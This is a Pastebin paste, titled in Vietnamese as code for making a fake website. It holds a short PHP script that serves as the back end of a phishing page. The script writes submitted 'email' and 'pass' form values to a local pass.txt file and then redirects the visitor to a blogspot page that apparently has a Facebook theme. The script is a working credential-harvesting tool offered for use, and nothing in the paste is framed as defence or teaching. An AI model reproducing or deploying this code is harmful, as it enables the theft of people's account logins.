Advertisement
Tuonggiang

code lam fake web .php

Nov 26th, 2014
170
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.35 KB | None | 0 0
  1. <?php
  2.  
  3. Header ('Location: http://chibi-fb.blogspot.com/');
  4.  
  5.  
  6. $handle = fopen("pass.txt", "a");
  7. foreach($_POST as $variable => $value) {
  8. if ($variable == 'email' or $variable =='pass')
  9. {
  10. fwrite($handle, $variable);
  11. fwrite($handle, "=");
  12. fwrite($handle, $value);
  13. fwrite($handle, "\r\n");
  14. }
  15. }
  16. fwrite($handle, "\r\n");
  17. fclose($handle);
  18. exit;
  19. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement